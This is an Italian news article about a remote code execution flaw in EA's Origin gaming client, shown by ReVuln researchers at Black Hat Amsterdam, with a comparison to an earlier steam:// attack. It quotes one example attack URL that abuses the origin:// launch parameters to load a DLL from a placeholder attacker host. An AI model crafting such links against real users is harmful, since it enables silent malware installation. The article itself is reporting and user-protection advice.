Vulnerabilità Origin consente l'esecuzione di codice da remoto

Gli oltre 40 milioni di utenti di Origin potrebbero essere a rischio secondo le ricerche di un gruppo di programmatori italiani, che operano sotto l'etichetta ReVuln. La piattaforma di gioco online di Electronic Arts, infatti, consentirebbe a malintenzionati di eseguire codice sui computer dei giocatori in modalità remota.

L'attacco è stato dimostrato venerdì scorso in occasione della conferenza sulla sicurezza Black Hat che si è svolta ad Amsterdam. Servono pochi secondi per portare a termine la procedura e in alcuni casi non è necessaria alcuna interazione da parte delle vittime. L'attacco è basato sulla manipolazione del protocollo URL che viene utilizzato per l'avvio automatico dei giochi sui PC o sui Mac.

Sfruttando i difetti nell'applicazione Origin, sia nella sua variante Mac che in quella PC, quest'ultima può essere trasformata in uno strumento per attaccare gli utenti e installare silenziosamente malware sui computer di questi ultimi.

"La piattaforma Origin consente agli utenti malintenzionati di sfruttare le vulnerabilità locali attraverso il meccanismo di gestione degli URL", sostengono Donato Ferrante e Luigi Auriemma, i due ricercatori di ReVuln. "Un utente malitenzionato potrebbe creare un collegamento internet in modo da eseguire codice dannoso in modalità remota sul computer della vittima che ha installato Origin".

Ad Amsterdam, i due ricercatori hanno mostrato una demo in cui si vede come sia possibile eseguire codice da remoto su un computer con Origin e Crysis 3 installati. La piattaforma EA usa il link origin://LaunchGame/71503 per l'attivazione del gioco, ma anche gli utenti possono clickare su link come origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll. Nella demo si vedeva come in questo caso il client Origin caricasse una libreria a collegamento dinamico di Windows sul computer della vittima.

Electronic Arts, secondo quanto riporta Ars Technica, ha già inoltrato un comunicato ufficiale sulla faccenda. "Il nostro team indaga costantemente su problematiche come questa e aggiorniamo senza soluzione di continuità la nostra infrastruttura di sicurezza", è la posizione ufficiale di EA.

Si tratta di un attacco molto simile a quello dimostrato dagli stessi ricercatori nel caso di Steam. I due di ReVuln dimostravano come la piattaforma digitale di Valve fosse a rischio exploit per via del modo in cui gestisce il protocollo URL "steam://".

Grazie a protocolli di questo tipo si possono raggiungere delle pagine web in cui attivare un gioco o accedere a una particolare promozione, oppure per scaricare tool, leggere news, controllare i profili di altri giocatori. Ma con lo stesso sistema vengono gestiti altri tipi di comandi, come l'installazione e la disinstallazione dei giochi, la connessione ai server di gioco, l'esecuzione di un gioco.

In quell'occasione, i due ricercatori consigliavano agli utenti di disabilitare l'avvio automatico tramite gli URL "steam://". L'attacco attraverso Origin funziona, dunque, in modo molto simile, sfruttando la funzionalità che consente tramite web di avviare i giochi da remoto. Il comando che normalmente serve per avviare un gioco, infatti, può essere modificato al fine di indurre il PC a installare un programma dannoso.

Quando un link origin:// viene lanciato per la prima volta su un computer, i browser web tipicamente chiedono all'utente se vuole lanciare effettivamente il client Origin associato a quel tipo di link. I vari browser gestiscono in maniera differente questa operazione: alcuni mostrano all'utente il percorso web completo, mentre altri ne rivelano solamente una parte. Se l'utente conferma questo tipo di comportamento per il suo PC, allora tutti i link di quel tipo lanceranno la piattaforma Origin. In questo caso quell'utente non potrà più essere protetto da eventuali attacchi da remoto, e non serviranno ulteriori interazioni affinché avvenga la penetrazione di codice dannoso sul sistema. Gli utenti che vogliono mantenere un elevato livello di protezione dovrebbero invece assicurarsi che il sistema notifichi sempre del tentativo di lancio di un software associato a un URL di questo tipo.